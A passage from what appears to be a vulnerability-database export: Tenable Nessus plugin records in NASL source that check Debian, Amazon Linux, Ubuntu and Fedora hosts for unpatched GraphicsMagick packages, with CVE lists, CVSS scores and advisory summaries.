exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick3\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T01:19:40", "description": "A possible heap overflow was discovered in the EscapeParenthesis() function (CVE-2016-7447).\n\nVarious issues were found in the processing of SVG files in GraphicsMagick (CVE-2016-7446).\n\nThe TIFF reader had a bug pertaining to use of TIFFGetField() when a 'count' value is returned. The bug caused a heap read overflow (due to using strlcpy() to copy a possibly unterminated string) which could allow an untrusted file to crash the software (CVE-2016-7449).\n\nThe Utah RLE reader did not validate that header information was reasonable given the file size and so it could cause huge memory allocations and/or consume huge amounts of CPU, causing a denial of service (CVE-2016-7448)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-13T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : GraphicsMagick (ALAS-2016-752)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:GraphicsMagick", "p-cpe:/a:amazon:linux:graphicsmagick-c%2b%2b", "p-cpe:/a:amazon:linux:graphicsmagick-c%2b%2b-devel", "p-cpe:/a:amazon:linux:GraphicsMagick-debuginfo", "p-cpe:/a:amazon:linux:GraphicsMagick-devel", "p-cpe:/a:amazon:linux:GraphicsMagick-doc", "p-cpe:/a:amazon:linux:GraphicsMagick-perl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-752.NASL", "href": "https://www.tenable.com/plugins/nessus/94018", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-752.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94018);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-7446\", \"CVE-2016-7447\", \"CVE-2016-7448\", \"CVE-2016-7449\");\n script_xref(name:\"ALAS\", value:\"2016-752\");\n\n script_name(english:\"Amazon Linux AMI : GraphicsMagick (ALAS-2016-752)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A possible heap overflow was discovered in the EscapeParenthesis()\nfunction (CVE-2016-7447).\n\nVarious issues were found in the processing of SVG files in\nGraphicsMagick (CVE-2016-7446).\n\nThe TIFF reader had a bug pertaining to use of TIFFGetField() when a\n'count' value is returned. The bug caused a heap read overflow (due to\nusing strlcpy() to copy a possibly unterminated string) which could\nallow an untrusted file to crash the software (CVE-2016-7449).\n\nThe Utah RLE reader did not validate that header information was\nreasonable given the file size and so it could cause huge memory\nallocations and/or consume huge amounts of CPU, causing a denial of\nservice (CVE-2016-7448)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-752.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update GraphicsMagick' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-1.3.25-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-c++-1.3.25-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-c++-devel-1.3.25-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-debuginfo-1.3.25-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-devel-1.3.25-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-doc-1.3.25-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-perl-1.3.25-1.9.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-c++ / GraphicsMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-18T11:57:35", "description": "It was discovered that GraphicsMagick incorrectly handled certain image files. An attacker could possibly use this issue to cause a denial of service or other unspecified impact.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-01-23T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : GraphicsMagick vulnerabilities (USN-4248-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-16545", "CVE-2017-16547", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17783"], "modified": "2020-09-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:graphicsmagick", "p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick%2b%2b-q16-12", "p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick-q16-3", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-4248-1.NASL", "href": "https://www.tenable.com/plugins/nessus/133207", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4248-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133207);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\");\n script_xref(name:\"USN\", value:\"4248-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : GraphicsMagick vulnerabilities (USN-4248-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that GraphicsMagick incorrectly handled certain\nimage files. An attacker could possibly use this issue to cause a\ndenial of service or other unspecified impact.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4248-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected graphicsmagick, libgraphicsmagick++-q16-12 and /\nor libgraphicsmagick-q16-3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick++-q16-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick-q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2020 Canonical, Inc. / NASL script (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"graphicsmagick\", pkgver:\"1.3.23-1ubuntu0.5\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgraphicsmagick++-q16-12\", pkgver:\"1.3.23-1ubuntu0.5\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgraphicsmagick-q16-3\", pkgver:\"1.3.23-1ubuntu0.5\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"graphicsmagick / libgraphicsmagick++-q16-12 / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-24T15:28:08", "description": "Latest stable release, includes many bug and security fixes.\n\nSee also http://www.graphicsmagick.org/NEWS.html#january-20-2017\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-01T00:00:00", "type": "nessus", "title": "Fedora 27 : GraphicsMagick (2018-7c61d08c4f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-13147", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:GraphicsMagick", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-7C61D08C4F.NASL", "href": "https://www.tenable.com/plugins/nessus/106539", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-7c61d08c4f.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106539);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-11102\", \"CVE-2017-11139\", \"CVE-2017-11140\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11641\", \"CVE-2017-11643\", \"CVE-2017-13147\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17782\", \"CVE-2017-17783\", \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\");\n script_xref(name:\"FEDORA\", value:\"2018-7c61d08c4f\");\n\n script_name(english:\"Fedora 27 : GraphicsMagick (2018-7c61d08c4f)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Latest stable release, includes many bug and security fixes.\n\nSee also http://www.graphicsmagick.org/NEWS.html#january-20-2017\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#january-20-2017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-7c61d08c4f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"GraphicsMagick-1.3.28-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-24T15:28:50", "description": "Latest stable release, includes many bug and security fixes.\n\nSee also http://www.graphicsmagick.org/NEWS.html#january-20-2017\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-01T00:00:00", "type": "nessus", "title": "Fedora 26 : GraphicsMagick (2018-bfb9835edd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-13147", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:GraphicsMagick", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-BFB9835EDD.NASL", "href": "https://www.tenable.com/plugins/nessus/106541", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-bfb9835edd.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106541);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-11102\", \"CVE-2017-11139\", \"CVE-2017-11140\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11641\", \"CVE-2017-11643\", \"CVE-2017-13147\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17782\", \"CVE-2017-17783\", \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\");\n script_xref(name:\"FEDORA\", value:\"2018-bfb9835edd\");\n\n script_name(english:\"Fedora 26 : GraphicsMagick (2018-bfb9835edd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Latest stable release, includes many bug and security fixes.\n\nSee also http://www.graphicsmagick.org/NEWS.html#january-20-2017\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#january-20-2017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-bfb9835edd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"GraphicsMagick-1.3.28-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:39:51", "description": "Various security issues were found and fixed in graphicsmagick in Debian wheezy LTS.\n\nCVE-2016-7446\n\nHeap buffer overflow issue in MVG/SVG rendering.\n\nCVE-2016-7447\n\nHeap overflow of the EscapeParenthesis() function\n\nCVE-2016-7449\n\nTIFF related problems due to use of strlcpy use.\n\nCVE-2016-7800\n\nFix unsigned underflow leading to heap overflow when parsing 8BIM chunk.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.3.16-1.1+deb7u4.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-12T00:00:00", "type": "nessus", "title": "Debian DLA-651-1 : graphicsmagick security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7449", "CVE-2016-7800"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b3", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick3", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-651.NASL", "href": 